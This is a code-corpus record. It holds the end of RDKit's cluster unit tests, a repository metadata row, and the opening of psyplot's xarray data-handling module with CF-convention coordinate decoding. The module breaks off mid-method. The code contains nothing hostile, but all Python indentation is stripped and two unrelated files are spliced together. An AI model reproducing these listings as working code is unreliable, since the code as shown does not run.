cc = Clusters.Cluster(index=3)
cd = Clusters.Cluster(index=4)
ce = Clusters.Cluster(index=5)
cf = Clusters.Cluster(index=6)
c1 = Clusters.Cluster(metric=10, children=[ca, cb], index=7)
c2 = Clusters.Cluster(metric=15, children=[cc, cd], index=8)
c3 = Clusters.Cluster(metric=20, children=[ce, cf], index=9)
c4 = Clusters.Cluster(metric=25, children=[c2, c3], index=10)
c5 = Clusters.Cluster(metric=30, children=[c4, c1], index=11)
cs = ClusterUtils.SplitIntoNClusters(c5, 4, breadthFirst=True)
assert len(cs) == 4, 'bad split length'
indices = [x.GetIndex() for x in cs]
for index in [9, 8, 1, 2]:
assert index in indices, 'index %d not found in %s' % (index, str(indices))
# we may not want to preserve order, but test it for now
assert indices == [9, 8, 1, 2], 'bad index order'
cs2 = ClusterUtils.SplitIntoNClusters(c5, 4, breadthFirst=False)
indices = [x.GetIndex() for x in cs2]
for index in [8, 7, 5, 6]:
assert index in indices, 'index %d not found in %s' % (index, str(indices))
# we may not want to preserve order, but test it for now
assert indices == [8, 7, 5, 6], 'bad index order'
# Exceptions and edge cases
self.assertRaises(ValueError, ClusterUtils.SplitIntoNClusters, c5, len(c5) + 1)
self.assertEqual(ClusterUtils.SplitIntoNClusters(c5, len(c5)), c5.GetPoints())
self.assertEqual(ClusterUtils.SplitIntoNClusters(c5, 0), [c5])
for n in range(len(c5)):
if n >= 7: # Code fails for n = 7 and above
self.assertRaises(AssertionError, ClusterUtils.SplitIntoNClusters,
c5, n, breadthFirst=True)
else:
ClusterUtils.SplitIntoNClusters(c5, n, breadthFirst=True)
self.assertRaises(ValueError, ClusterUtils.SplitIntoNClusters, c5, len(c5) + 1,
breadthFirst=False)
self.assertEqual(
ClusterUtils.SplitIntoNClusters(c5, len(c5), breadthFirst=False), c5.GetPoints())
self.assertEqual(ClusterUtils.SplitIntoNClusters(c5, 0, breadthFirst=False), [c5])
for n in range(len(c5)):
if n >= 7: # Code fails for n = 7 and above
self.assertRaises(AssertionError, ClusterUtils.SplitIntoNClusters, c5, n,
breadthFirst=False)
else:
ClusterUtils.SplitIntoNClusters(c5, n, breadthFirst=False)
@unittest.skipIf(Murtagh.MurtaghCluster is None, "Murtagh clustering not available")
def testMurtaghUPGMA(self):
if Murtagh is None:
return
nPts = 5
sz = 5
dataP = numpy.random.random((nPts, sz))
newClust = Murtagh.ClusterData(dataP, nPts, Murtagh.UPGMA)[0]
ds = []
for i in range(nPts):
for j in range(i):
d = dataP[i] - dataP[j]
ds.append(sum(d * d))
ds = numpy.array(ds)
newClust2 = Murtagh.ClusterData(ds, nPts, Murtagh.UPGMA, isDistData=1)[0]
assert len(newClust) == len(newClust2), 'length mismatch2'
assert not newClust.Compare(newClust2, ignoreExtras=0), 'equality failed3'
newClust2 = Murtagh.ClusterData(dataP, nPts, Murtagh.UPGMA, isDistData=0)[0]
assert len(newClust) == len(newClust2), 'length mismatch2'
assert not newClust.Compare(newClust2, ignoreExtras=0), 'equality failed3'
def test_Cluster(self):
""" tests the Cluster class functionality """
root = Clusters.Cluster(index=1, position=1)
c1 = Clusters.Cluster(index=10, position=10)
c1.AddChild(Clusters.Cluster(index=30, position=30))
c1.AddChild(Clusters.Cluster(index=31, position=31))
t32 = Clusters.Cluster(index=32, position=32)
c1.AddChild(t32)
c2 = Clusters.Cluster(index=11)
# c2.AddChild(Clusters.Cluster(index=40))
# c2.AddChild(Clusters.Cluster(index=41))
c2.AddChildren([Clusters.Cluster(index=40), Clusters.Cluster(index=41)])
root.AddChild(c1)
root.AddChild(c2)
nodes = ClusterUtils.GetNodeList(root)
indices = [x.GetIndex() for x in nodes]
assert indices == [30, 31, 32, 10, 40, 41, 11, 1], 'bad indices'
subtree = root.FindSubtree(11)
self.assertEqual([x.GetIndex() for x in ClusterUtils.GetNodeList(subtree)], [40, 41, 11])
self.assertFalse(root.IsTerminal())
self.assertTrue(t32.IsTerminal())
self.assertEqual(root.GetData(), None)
root.SetData(3.14)
self.assertEqual(root.GetData(), 3.14)
self.assertEqual(root.GetMetric(), 0.0)
root.SetMetric(0.1)
self.assertEqual(root.GetMetric(), 0.1)
self.assertEqual(root.GetIndex(), 1)
root.SetIndex(100)
self.assertEqual(root.GetIndex(), 100)
self.assertEqual(root.GetPointsPositions(), [30, 31, 32, []])
root.RemoveChild(c1)
self.assertEqual([x.GetIndex() for x in ClusterUtils.GetNodeList(root)], [40, 41, 11, 100])
self.assertEqual(root.GetName(), 'Cluster(100)')
root.SetName('abc')
self.assertEqual(root.GetName(), 'abc')
f = StringIO()
with redirect_stdout(f):
root.Print(showData=True)
self.assertIn('abc', f.getvalue())
self.assertIn('Cluster(41)', f.getvalue())
self.assertIn('Metric', f.getvalue())
if __name__ == '__main__': # pragma: nocover
unittest.main()
|
ptosco/rdkit
|
rdkit/ML/Cluster/UnitTestCluster.py
|
Python
|
bsd-3-clause
| 6,718
|
[
"RDKit"
] |
2c01812618917c5121340971b0dcbca300b7b9d7b32d5ab99f4e8b605ef30897
|
from __future__ import division
import os
import os.path as osp
import inspect
from threading import Thread
from functools import partial
from glob import glob
from importlib import import_module
import re
import six
from collections import defaultdict
from itertools import chain, product, repeat, starmap, count, cycle, islice
import xarray as xr
from xarray.core.utils import NDArrayMixin
from xarray.core.formatting import first_n_items, format_item
import xarray.backends.api as xarray_api
from pandas import to_datetime
import numpy as np
import datetime as dt
import logging
from psyplot.config.rcsetup import rcParams, safe_list
from psyplot.docstring import dedent, docstrings
from psyplot.compat.pycompat import (
zip, map, isstring, OrderedDict, filter, range, getcwd,
Queue)
from psyplot.warning import PsyPlotRuntimeWarning
from warnings import warn
import psyplot.utils as utils
try:
import dask
with_dask = True
except ImportError:
with_dask = False
try:
import xarray.backends.plugins as xr_plugins
except ImportError:
xr_plugins = None # type: ignore
# No data variable. This is used for filtering if an attribute could not have
# been accessed
_NODATA = object
VARIABLELABEL = 'variable'
logger = logging.getLogger(__name__)
_ds_counter = count(1)
xr_version = tuple(map(int, xr.__version__.split('.')[:2]))
def _no_auto_update_getter(self):
""":class:`bool`. Boolean controlling whether the :meth:`start_update`
method is automatically called by the :meth:`update` method
Examples
--------
You can disable the automatic update via
>>> with data.no_auto_update:
... data.update(time=1)
... data.start_update()
To permanently disable the automatic update, simply set
>>> data.no_auto_update = True
>>> data.update(time=1)
>>> data.no_auto_update = False # reenable automatical update"""
if getattr(self, '_no_auto_update', None) is not None:
return self._no_auto_update
else:
self._no_auto_update = utils._TempBool()
return self._no_auto_update
def _infer_interval_breaks(coord):
"""
>>> _infer_interval_breaks(np.arange(5))
array([-0.5, 0.5, 1.5, 2.5, 3.5, 4.5])
Taken from xarray.plotting.plot module
"""
coord = np.asarray(coord)
deltas = 0.5 * (coord[1:] - coord[:-1])
first = coord[0] - deltas[0]
last = coord[-1] + deltas[-1]
return np.r_[[first], coord[:-1] + deltas, [last]]
def _get_variable_names(arr):
"""Return the variable names of an array"""
if VARIABLELABEL in arr.dims:
return arr.coords[VARIABLELABEL].tolist()
else:
return arr.name
def _get_dims(arr):
"""Return all dimensions but the :attr:`VARIABLELABEL`"""
return tuple(filter(lambda d: d != VARIABLELABEL, arr.dims))
def _open_store(store_mod, store_cls, fname):
try:
return getattr(import_module(store_mod), store_cls).open(fname)
except AttributeError:
return getattr(import_module(store_mod), store_cls)(fname)
def _fix_times(dims):
# xarray 0.16 fails with pandas 1.1.0 for datetime, see
# https://github.com/pydata/xarray/issues/4283
for key, val in dims.items():
if np.issubdtype(np.asarray(val).dtype, np.datetime64):
dims[key] = to_datetime(val)
@docstrings.get_sections(base='setup_coords')
@dedent
def setup_coords(arr_names=None, sort=[], dims={}, **kwargs):
"""
Sets up the arr_names dictionary for the plot
Parameters
----------
arr_names: string, list of strings or dictionary
Set the unique array names of the resulting arrays and (optionally)
dimensions.
- if string: same as list of strings (see below). Strings may
include {0} which will be replaced by a counter.
- list of strings: those will be used for the array names. The final
number of dictionaries in the return depend in this case on the
`dims` and ``**furtherdims``
- dictionary:
Then nothing happens and an :class:`OrderedDict` version of
`arr_names` is returned.
sort: list of strings
This parameter defines how the dictionaries are ordered. It has no
effect if `arr_names` is a dictionary (use a
:class:`~collections.OrderedDict` for that). It can be a list of
dimension strings matching to the dimensions in `dims` for the
variable.
dims: dict
Keys must be variable names of dimensions (e.g. time, level, lat or
lon) or 'name' for the variable name you want to choose.
Values must be values of that dimension or iterables of the values
(e.g. lists). Note that strings will be put into a list.
For example dims = {'name': 't2m', 'time': 0} will result in one plot
for the first time step, whereas dims = {'name': 't2m', 'time': [0, 1]}
will result in two plots, one for the first (time == 0) and one for the
second (time == 1) time step.
``**kwargs``
The same as `dims` (those will update what is specified in `dims`)
Returns
-------
~collections.OrderedDict
A mapping from the keys in `arr_names` and to dictionaries. Each
dictionary corresponds defines the coordinates of one data array to
load"""
try:
return OrderedDict(arr_names)
except (ValueError, TypeError):
# ValueError for cyordereddict, TypeError for collections.OrderedDict
pass
if arr_names is None:
arr_names = repeat('arr{0}')
elif isstring(arr_names):
arr_names = repeat(arr_names)
dims = OrderedDict(dims)
for key, val in six.iteritems(kwargs):
dims.setdefault(key, val)
sorted_dims = OrderedDict()
if sort:
for key in sort:
sorted_dims[key] = dims.pop(key)
for key, val in six.iteritems(dims):
sorted_dims[key] = val
else:
# make sure, it is first sorted for the variable names
if 'name' in dims:
sorted_dims['name'] = None
for key, val in sorted(dims.items()):
sorted_dims[key] = val
for key, val in six.iteritems(kwargs):
sorted_dims.setdefault(key, val)
for key, val in six.iteritems(sorted_dims):
sorted_dims[key] = iter(safe_list(val))
return OrderedDict([
(arr_name.format(i), dict(zip(sorted_dims.keys(), dim_tuple)))
for i, (arr_name, dim_tuple) in enumerate(zip(
arr_names, product(
*map(list, sorted_dims.values()))))])
def to_slice(arr):
"""Test whether `arr` is an integer array that can be replaced by a slice
Parameters
----------
arr: numpy.array
Numpy integer array
Returns
-------
slice or None
If `arr` could be converted to an array, this is returned, otherwise
`None` is returned
See Also
--------
get_index_from_coord"""
if isinstance(arr, slice):
return arr
if len(arr) == 1:
return slice(arr[0], arr[0] + 1)
step = np.unique(arr[1:] - arr[:-1])
if len(step) == 1:
return slice(arr[0], arr[-1] + step[0], step[0])
def get_index_from_coord(coord, base_index):
"""Function to return the coordinate as integer, integer array or slice
If `coord` is zero-dimensional, the corresponding integer in `base_index`
will be supplied. Otherwise it is first tried to return a slice, if that
does not work an integer array with the corresponding indices is returned.
Parameters
----------
coord: xarray.Coordinate or xarray.Variable
Coordinate to convert
base_index: pandas.Index
The base index from which the `coord` was extracted
Returns
-------
int, array of ints or slice
The indexer that can be used to access the `coord` in the
`base_index`
"""
try:
values = coord.values
except AttributeError:
values = coord
if values.ndim == 0:
return base_index.get_loc(values[()])
if len(values) == len(base_index) and (values == base_index).all():
return slice(None)
values = np.array(list(map(lambda i: base_index.get_loc(i), values)))
return to_slice(values) or values
#: mapping that translates datetime format strings to regex patterns
t_patterns = {
'%Y': '[0-9]{4}',
'%m': '[0-9]{1,2}',
'%d': '[0-9]{1,2}',
'%H': '[0-9]{1,2}',
'%M': '[0-9]{1,2}',
'%S': '[0-9]{1,2}',
}
@docstrings.get_sections(base='get_tdata')
@dedent
def get_tdata(t_format, files):
"""
Get the time information from file names
Parameters
----------
t_format: str
The string that can be used to get the time information in the files.
Any numeric datetime format string (e.g. %Y, %m, %H) can be used, but
not non-numeric strings like %b, etc. See [1]_ for the datetime format
strings
files: list of str
The that contain the time informations
Returns
-------
pandas.Index
The time coordinate
list of str
The file names as they are sorten in the returned index
References
----------
.. [1] https://docs.python.org/2/library/datetime.html"""
def median(arr):
return arr.min() + (arr.max() - arr.min())/2
import re
from pandas import Index
t_pattern = t_format
for fmt, patt in t_patterns.items():
t_pattern = t_pattern.replace(fmt, patt)
t_pattern = re.compile(t_pattern)
time = list(range(len(files)))
for i, f in enumerate(files):
time[i] = median(np.array(list(map(
lambda s: np.datetime64(dt.datetime.strptime(s, t_format)),
t_pattern.findall(f)))))
ind = np.argsort(time) # sort according to time
files = np.array(files)[ind]
time = np.array(time)[ind]
return to_datetime(Index(time, name='time')), files
docstrings.get_sections(xr.Dataset.to_netcdf.__doc__,
'xarray.Dataset.to_netcdf')
@docstrings.dedent
def to_netcdf(ds, *args, **kwargs):
"""
Store the given dataset as a netCDF file
This functions works essentially the same as the usual
:meth:`xarray.Dataset.to_netcdf` method but can also encode absolute time
units
Parameters
----------
ds: xarray.Dataset
The dataset to store
%(xarray.Dataset.to_netcdf.parameters)s
"""
to_update = {}
for v, obj in six.iteritems(ds.variables):
units = obj.attrs.get('units', obj.encoding.get('units', None))
if units == 'day as %Y%m%d.%f' and np.issubdtype(
obj.dtype, np.datetime64):
to_update[v] = xr.Variable(
obj.dims, AbsoluteTimeEncoder(obj), attrs=obj.attrs.copy(),
encoding=obj.encoding)
to_update[v].attrs['units'] = units
if to_update:
ds = ds.copy()
ds.update(to_update)
return xarray_api.to_netcdf(ds, *args, **kwargs)
def _get_fname_netCDF4(store):
"""Try to get the file name from the NetCDF4DataStore store"""
return getattr(store, '_filename', None)
def _get_fname_scipy(store):
"""Try to get the file name from the ScipyDataStore store"""
try:
return store.ds.filename
except AttributeError:
return None
def _get_fname_nio(store):
"""Try to get the file name from the NioDataStore store"""
try:
f = store.ds.file
except AttributeError:
return None
try:
return f.path
except AttributeError:
return None
class Signal(object):
"""Signal to connect functions to a specific event
This class behaves almost similar to PyQt's
:class:`PyQt4.QtCore.pyqtBoundSignal`
"""
instance = None
owner = None
def __init__(self, name=None, cls_signal=False):
self.name = name
self.cls_signal = cls_signal
self._connections = []
def connect(self, func):
if func not in self._connections:
self._connections.append(func)
def emit(self, *args, **kwargs):
if (not getattr(self.owner, 'block_signals', False) and
not getattr(self.instance, 'block_signals', False)):
logger.debug('Emitting signal %s', self.name)
for func in self._connections[:]:
logger.debug('Calling %s', func)
func(*args, **kwargs)
def disconnect(self, func=None):
"""Disconnect a function call to the signal. If None, all connections
are disconnected"""
if func is None:
self._connections = []
else:
self._connections.remove(func)
def __get__(self, instance, owner):
self.owner = owner
if instance is None or self.cls_signal:
return self
ret = getattr(instance, self.name, None)
if ret is None:
setattr(instance, self.name, Signal(self.name))
ret = getattr(instance, self.name, None)
ret.instance = instance
return ret
#: functions to use to extract the file name from a data store
get_fname_funcs = [_get_fname_netCDF4, _get_fname_scipy, _get_fname_nio]
@docstrings.get_sections(base='get_filename_ds')
@docstrings.dedent
def get_filename_ds(ds, dump=True, paths=None, **kwargs):
"""
Return the filename of the corresponding to a dataset
This method returns the path to the `ds` or saves the dataset
if there exists no filename
Parameters
----------
ds: xarray.Dataset
The dataset you want the path information for
dump: bool
If True and the dataset has not been dumped so far, it is dumped to a
temporary file or the one generated by `paths` is used
paths: iterable or True
An iterator over filenames to use if a dataset has no filename.
If paths is ``True``, an iterator over temporary files will be
created without raising a warning
Other Parameters
----------------
``**kwargs``
Any other keyword for the :func:`to_netcdf` function
%(xarray.Dataset.to_netcdf.parameters)s
Returns
-------
str or None
None, if the dataset has not yet been dumped to the harddisk and
`dump` is False, otherwise the complete the path to the input
file
str
The module of the :class:`xarray.backends.common.AbstractDataStore`
instance that is used to hold the data
str
The class name of the
:class:`xarray.backends.common.AbstractDataStore` instance that is
used to open the data
"""
from tempfile import NamedTemporaryFile
# if already specified, return that filename
if ds.psy._filename is not None:
return tuple([ds.psy._filename] + list(ds.psy.data_store))
def dump_nc():
# make sure that the data store is not closed by providing a
# write argument
if xr_version < (0, 11):
kwargs.setdefault('writer', xarray_api.ArrayWriter())
store = to_netcdf(ds, fname, **kwargs)
else:
# `writer` parameter was removed by
# https://github.com/pydata/xarray/pull/2261
kwargs.setdefault('multifile', True)
store = to_netcdf(ds, fname, **kwargs)[1]
store_mod = store.__module__
store_cls = store.__class__.__name__
ds._file_obj = store
return store_mod, store_cls
def tmp_it():
while True:
yield NamedTemporaryFile(suffix='.nc').name
def _legacy_get_filename_ds(ds):
# try to get the filename from the data store of the obj
#
# Outdated possibility since the backend plugin methodology of
# xarray 0.18
if store_mod is not None:
store = ds._file_obj
# try several engines
if hasattr(store, 'file_objs'):
fname = []
store_mod = []
store_cls = []
for obj in store.file_objs: # mfdataset
_fname = None
for func in get_fname_funcs:
if _fname is None:
_fname = func(obj)
if _fname is not None:
fname.append(_fname)
store_mod.append(obj.__module__)
store_cls.append(obj.__class__.__name__)
fname = tuple(fname)
store_mod = tuple(store_mod)
store_cls = tuple(store_cls)
else:
for func in get_fname_funcs:
fname = func(store)
if fname is not None:
break
return fname, store_mod, store_cls
fname = None
if paths is True or (dump and paths is None):
paths = tmp_it()
elif paths is not None:
if isstring(paths):
paths = iter([paths])
else:
paths = iter(paths)
store_mod, store_cls = ds.psy.data_store
if xr_plugins is None:
fname, store_mod, store_cls = _legacy_get_filename_ds(ds)
elif "source" in ds.encoding:
fname = ds.encoding["source"]
store_mod = None
store_cls = None
# check if paths is provided and if yes, save the file
if fname is None and paths is not None:
fname = next(paths, None)
if dump and fname is not None:
store_mod, store_cls = dump_nc()
ds.psy.filename = fname
ds.psy.data_store = (store_mod, store_cls)
return fname, store_mod, store_cls
class CFDecoder(object):
"""
Class that interpretes the coordinates and attributes accordings to
cf-conventions"""
_registry = []
@property
def logger(self):
""":class:`logging.Logger` of this instance"""
try:
return self._logger
except AttributeError:
name = '%s.%s' % (self.__module__, self.__class__.__name__)
self._logger = logging.getLogger(name)
self.logger.debug('Initializing...')
return self._logger
@logger.setter
def logger(self, value):
self._logger = value
def __init__(self, ds=None, x=None, y=None, z=None, t=None):
self.ds = ds
self.x = rcParams['decoder.x'].copy() if x is None else set(x)
self.y = rcParams['decoder.y'].copy() if y is None else set(y)
self.z = rcParams['decoder.z'].copy() if z is None else set(z)
self.t = rcParams['decoder.t'].copy() if t is None else set(t)
@staticmethod
def register_decoder(decoder_class, pos=0):
"""Register a new decoder
This function registeres a decoder class to use
Parameters
----------
decoder_class: type
The class inherited from the :class:`CFDecoder`
pos: int
The position where to register the decoder (by default: the first
position"""
CFDecoder._registry.insert(pos, decoder_class)
@classmethod
@docstrings.get_sections(base='CFDecoder.can_decode', sections=['Parameters',
'Returns'])
def can_decode(cls, ds, var):
"""
Class method to determine whether the object can be decoded by this
decoder class.
Parameters
----------
ds: xarray.Dataset
The dataset that contains the given `var`
var: xarray.Variable or xarray.DataArray
The array to decode
Returns
-------
bool
True if the decoder can decode the given array `var`. Otherwise
False
Notes
-----
The default implementation returns True for any argument. Subclass this
method to be specific on what type of data your decoder can decode
"""
return True
@classmethod
@docstrings.dedent
def get_decoder(cls, ds, var, *args, **kwargs):
"""
Class method to get the right decoder class that can decode the
given dataset and variable
Parameters
----------
%(CFDecoder.can_decode.parameters)s
Returns
-------
CFDecoder
The decoder for the given dataset that can decode the variable
`var`"""
for decoder_cls in cls._registry:
if decoder_cls.can_decode(ds, var):
return decoder_cls(ds, *args, **kwargs)
return CFDecoder(ds, *args, **kwargs)
@staticmethod
@docstrings.get_sections(base='CFDecoder.decode_coords', sections=[
'Parameters', 'Returns'])
def decode_coords(ds, gridfile=None):
"""
Sets the coordinates and bounds in a dataset
This static method sets those coordinates and bounds that are marked
marked in the netCDF attributes as coordinates in :attr:`ds` (without
deleting them from the variable attributes because this information is
necessary for visualizing the data correctly)
Parameters
----------
ds: xarray.Dataset
The dataset to decode
gridfile: str
The path to a separate grid file or a xarray.Dataset instance which
may store the coordinates used in `ds`
Returns
-------
xarray.Dataset
`ds` with additional coordinates"""
def add_attrs(obj):
if 'coordinates' in obj.attrs:
extra_coords.update(obj.attrs['coordinates'].split())
obj.encoding['coordinates'] = obj.attrs.pop('coordinates')
if 'grid_mapping' in obj.attrs:
extra_coords.add(obj.attrs['grid_mapping'])
if 'bounds' in obj.attrs:
extra_coords.add(obj.attrs['bounds'])
if gridfile is not None and not isinstance(gridfile, xr.Dataset):
gridfile = open_dataset(gridfile)
extra_coords = set(ds.coords)
for k, v in six.iteritems(ds.variables):
add_attrs(v)
add_attrs(ds)
if gridfile is not None:
ds.update({k: v for k, v in six.iteritems(gridfile.variables)
if k in extra_coords})
if xr_version < (0, 11):
ds.set_coords(extra_coords.intersection(ds.variables),
inplace=True)
else:
ds._coord_names.update(extra_coords.intersection(ds.variables))
return ds
@docstrings.get_sections(base='CFDecoder.is_unstructured', sections=[
'Parameters', 'Returns'])
@docstrings.get_sections(base=
'CFDecoder.get_cell_node_coord',
sections=['Parameters', 'Returns'])
@dedent
def get_cell_node_coord(self, var, coords=None, axis='x', nans=None):
"""
Checks whether the bounds in the variable attribute are triangular
Parameters
----------
var: xarray.Variable or xarray.DataArray
The variable to check
coords: dict
Coordinates to use. If None, the coordinates of the dataset in the
:attr:`ds` attribute are used.
axis: {'x', 'y'}
The spatial axis to check
nans: {None, 'skip', 'only'}
Determines whether values with nan shall be left (None), skipped
(``'skip'``) or shall be the only one returned (``'only'``)
Returns
-------
xarray.DataArray or None
the bounds corrdinate (if existent)"""
if coords is None:
coords = self.ds.coords
axis = axis.lower()
get_coord = self.get_x if axis == 'x' else self.get_y
coord = get_coord(var, coords=coords)
if coord is not None:
bounds = self._get_coord_cell_node_coord(coord, coords, nans,
var=var)
if bounds is None:
bounds = self.get_plotbounds(coord)
if bounds.ndim == 1:
dim0 = coord.dims[-1]
bounds = xr.DataArray(
np.dstack([bounds[:-1], bounds[1:]])[0],
dims=(dim0, '_bnds'), attrs=coord.attrs.copy(),
name=coord.name + '_bnds')
elif bounds.ndim == 2:
warn("2D bounds are not yet sufficiently tested!")
bounds = xr.DataArray(
np.dstack([bounds[1:, 1:].ravel(),
bounds[1:, :-1].ravel(),
bounds[:-1, :-1].ravel(),
bounds[:-1, 1:].ravel()])[0],
dims=(''.join(var.dims[-2:]), '_bnds'),
attrs=coord.attrs.copy(),
name=coord.name + '_bnds')
else:
raise NotImplementedError(
"More than 2D-bounds are not supported")
if bounds is not None and bounds.shape[-1] == 2:
# normal CF-Conventions for rectangular grids
arr = bounds.values
if axis == 'y':
stacked = np.c_[arr[..., :1], arr[..., :1],
arr[..., 1:], arr[..., 1:]]
if bounds.ndim == 2:
stacked = np.repeat(
stacked.reshape((-1, 4)),
len(self.get_x(var, coords)), axis=0)
else:
stacked = stacked.reshape((-1, 4))
else:
stacked = np.c_[arr, arr[..., ::-1]]
if bounds.ndim == 2:
stacked = np.tile(
stacked, (len(self.get_y(var, coords)), 1))
else:
stacked = stacked.reshape((-1, 4))
bounds = xr.DataArray(
stacked,
dims=('cell', bounds.dims[1]), name=bounds.name,
attrs=bounds.attrs)
return bounds
return None
docstrings.delete_params('CFDecoder.get_cell_node_coord.parameters',
'var', 'axis')
@docstrings.dedent
def _get_coord_cell_node_coord(self, coord, coords=None, nans=None,
var=None):
"""
Get the boundaries of an unstructed coordinate
Parameters
----------
coord: xr.Variable
The coordinate whose bounds should be returned
%(CFDecoder.get_cell_node_coord.parameters.no_var|axis)s
Returns
-------
%(CFDecoder.get_cell_node_coord.returns)s
"""
bounds = coord.attrs.get('bounds')
if bounds is not None:
bounds = self.ds.coords.get(bounds)
if bounds is not None:
if coords is not None:
bounds = bounds.sel(**{
key: coords[key]
for key in set(coords).intersection(bounds.dims)})
if nans is not None and var is None:
raise ValueError("Need the variable to deal with NaN!")
elif nans is None:
pass
elif nans == 'skip':
dims = [dim for dim in set(var.dims) - set(bounds.dims)]
mask = var.notnull().all(list(dims)) if dims else var.notnull()
try:
bounds = bounds[mask.values]
except IndexError: # 3D bounds
bounds = bounds.where(mask)
elif nans == 'only':
dims = [dim for dim in set(var.dims) - set(bounds.dims)]
mask = var.isnull().all(list(dims)) if dims else var.isnull()
bounds = bounds[mask.values]
else:
raise ValueError(
"`nans` must be either None, 'skip', or 'only'! "
"Not {0}!".format(str(nans)))
return bounds
@docstrings.get_sections(base='CFDecoder._check_unstructured_bounds', sections=[
'Parameters', 'Returns'])
@docstrings.dedent
def _check_unstructured_bounds(self, var, coords=None, axis='x', nans=None):
"""
Checks whether the bounds in the variable attribute are triangular
Parameters
----------
%(CFDecoder.get_cell_node_coord.parameters)s
Returns
-------
bool or None
True, if unstructered, None if it could not be determined
xarray.Coordinate or None
the bounds corrdinate (if existent)"""
# !!! WILL BE REMOVED IN THE NEAR FUTURE! !!!
bounds = self.get_cell_node_coord(var, coords, axis=axis, nans=nans)
if bounds is not None:
return bounds.shape[-1] == 3, bounds
else:
return None, None
@docstrings.dedent
def is_unstructured(self, var):
"""
Test if a variable is on an unstructered grid
Parameters
----------
%(CFDecoder.is_unstructured.parameters)s
Returns
-------
%(CFDecoder.is_unstructured.returns)s
Notes
-----
Currently this is the same as :meth:`is_unstructured` method, but may
change in the future to support hexagonal grids"""
if str(var.attrs.get('grid_type')) == 'unstructured':
return True
xcoord = self.get_x(var)
if xcoord is not None:
bounds = self._get_coord_cell_node_coord(xcoord)
if bounds is not None and bounds.ndim == 2 and bounds.shape[-1] > 2:
return True
@docstrings.dedent
def is_circumpolar(self, var):
"""
Test if a variable is on a circumpolar grid
Parameters
----------
%(CFDecoder.is_unstructured.parameters)s
Returns
-------
%(CFDecoder.is_unstructured.returns)s"""
xcoord = self.get_x(var)
return xcoord is not None and xcoord.ndim == 2
def get_variable_by_axis(self, var, axis, coords=None):
"""Return the coordinate matching the specified axis
This method uses to ``'axis'`` attribute in coordinates to return the
corresponding coordinate of the given variable
Possible types
--------------
var: xarray.Variable
The variable to get the dimension for
axis: {'x', 'y', 'z', 't'}
The axis string that identifies the dimension
coords: dict
Coordinates to use. If None, the coordinates of the dataset in the
:attr:`ds` attribute are used.
Returns
-------
xarray.Coordinate or None
The coordinate for `var` that matches the given `axis` or None if
no coordinate with the right `axis` could be found.
Notes
-----
This is a rather low-level function that only interpretes the
CFConvention. It is used by the :meth:`get_x`,
:meth:`get_y`, :meth:`get_z` and :meth:`get_t` methods
Warning
-------
If None of the coordinates have an ``'axis'`` attribute, we use the
``'coordinate'`` attribute of `var` (if existent).
Since however the CF Conventions do not determine the order on how
the coordinates shall be saved, we try to use a pattern matching
for latitude (``'lat'``) and longitude (``lon'``). If this patterns
do not match, we interpret the coordinates such that x: -1, y: -2,
z: -3. This is all not very safe for awkward dimension names,
but works for most cases. If you want to be a hundred percent sure,
use the :attr:`x`, :attr:`y`, :attr:`z` and :attr:`t` attribute.
See Also
--------
get_x, get_y, get_z, get_t"""
def get_coord(cname, raise_error=True):
try:
return coords[cname]
except KeyError:
if cname not in self.ds.coords:
if raise_error:
raise
return None
ret = self.ds.coords[cname]
try:
idims = var.psy.idims
except AttributeError: # got xarray.Variable
idims = {}
return ret.isel(**{d: sl for d, sl in idims.items()
if d in ret.dims})
axis = axis.lower()
if axis not in list('xyzt'):
raise ValueError("Axis must be one of X, Y, Z, T, not {0}".format(
axis))
# we first check for the dimensions and then for the coordinates
# attribute
coords = coords or self.ds.coords
coord_names = var.attrs.get('coordinates', var.encoding.get(
'coordinates', '')).split()
if not coord_names:
return
ret = []
matched = []
for coord in map(lambda dim: coords[dim], filter(
lambda dim: dim in coords, chain(
coord_names, var.dims))):
# check for the axis attribute or whether the coordinate is in the
# list of possible coordinate names
if coord.name not in (c.name for c in ret):
if coord.name in getattr(self, axis):
matched.append(coord)
elif coord.attrs.get('axis', '').lower() == axis:
ret.append(coord)
if matched:
if len(set([c.name for c in matched])) > 1:
warn("Found multiple matches for %s coordinate in the "
"coordinates: %s. I use %s" % (
axis, ', '.join([c.name for c in matched]),
matched[0].name),
PsyPlotRuntimeWarning)
return matched[0]
elif ret:
return None if len(ret) > 1 else ret[0]
# If the coordinates attribute is specified but the coordinate
# variables themselves have no 'axis' attribute, we interpret the
# coordinates such that x: -1, y: -2, z: -3
# Since however the CF Conventions do not determine the order on how
# the coordinates shall be saved, we try to use a pattern matching
# for latitude and longitude. This is not very nice, hence it is
# better to specify the :attr:`x` and :attr:`y` attribute
tnames = self.t.intersection(coord_names)
if axis == 'x':
for cname in filter(lambda cname: re.search('lon', cname),
coord_names):
return get_coord(cname)
return get_coord(coord_names[-1], raise_error=False)
elif axis == 'y' and len(coord_names) >= 2:
for cname in filter(lambda cname: re.search('lat', cname),
coord_names):
return get_coord(cname)
return get_coord(coord_names[-2], raise_error=False)
elif (axis == 'z' and len(coord_names) >= 3 and
coord_names[-3] not in tnames):
return get_coord(coord_names[-3], raise_error=False)
elif axis == 't' and tnames:
tname = next(iter(tnames))
if len(tnames) > 1:
warn("Found multiple matches for time coordinate in the "
"coordinates: %s. I use %s" % (', '.join(tnames), tname),
PsyPlotRuntimeWarning)
return get_coord(tname, raise_error=False)
@docstrings.get_sections(base="CFDecoder.get_x", sections=[
'Parameters', 'Returns'])
@dedent
def get_x(self, var, coords=None):
"""
Get the x-coordinate of a variable
This method searches for the x-coordinate in the :attr:`ds`. It first
checks whether there is one dimension that holds an ``'axis'``
attribute with 'X', otherwise it looks whether there is an intersection
between the :attr:`x` attribute and the variables dimensions, otherwise
it returns the coordinate corresponding to the last dimension of `var`
Possible types
--------------
var: xarray.Variable
The variable to get the x-coordinate for
coords: dict
Coordinates to use. If None, the coordinates of the dataset in the
:attr:`ds` attribute are used.
Returns
-------
xarray.Coordinate or None
The y-coordinate or None if it could be found"""
coords = coords or self.ds.coords
coord = self.get_variable_by_axis(var, 'x', coords)
if coord is not None:
return coord
return coords.get(self.get_xname(var))
def get_xname(self, var, coords=None):
"""Get the name of the x-dimension
This method gives the name of the x-dimension (which is not necessarily
the name of the coordinate if the variable has a coordinate attribute)
Parameters
----------
var: xarray.Variables
The variable to get the dimension for
coords: dict
The coordinates to use for checking the axis attribute. If None,
they are not used
Returns
-------
str
The coordinate name
See Also
--------
get_x"""
if coords is not None:
coord = self.get_variable_by_axis(var, 'x', coords)
if coord is not None and coord.name in var.dims:
